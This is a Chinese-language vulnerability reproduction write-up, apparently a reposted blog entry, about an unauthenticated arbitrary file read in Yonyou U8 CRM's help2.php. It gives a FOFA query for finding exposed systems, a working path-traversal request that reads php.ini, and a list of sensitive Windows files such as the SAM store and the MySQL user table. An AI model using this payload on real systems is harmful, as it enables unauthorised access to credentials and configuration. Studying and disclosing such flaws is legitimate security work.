用友U8CRM help2.php 任意文件读取漏洞复现

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、产品简介

用友U8CRM是一款针对代理销售服务行业设计的管理软件,它集客户关系管理(CRM)、呼叫中心和办公自动化(OA)核心应用于一体,提供前端营销、后端业务处理及员工管理的一体化解决方案。

二、漏洞描述

用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情况下即可进行漏洞利用。

三、影响范围

未知

四、复现环境

FOFA:app=“用友U8CRM”

五、漏洞复现

1.访问存在漏洞的网站
用友U8CRM help2.php 任意文件读取漏洞复现_第1张图片

2.访问/pub/help2.php?key=/…/…/apache/php.ini发现存在漏洞
用友U8CRM help2.php 任意文件读取漏洞复现_第2张图片

3.在此页查找error_log可看到此系统的安装路径,如果是C盘,则可查看更多敏感信息,我这里是D盘,没办法看C盘内容
用友U8CRM help2.php 任意文件读取漏洞复现_第3张图片
4.一些常用的敏感windows文件路径

C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件

六、修复建议

及时更新系统到最新版本,在防火墙限制敏感文件访问


参考链接

https://blog.csdn.net/xiayu729100940/article/details/135112796


你可能感兴趣的:(php,开发语言,网络安全)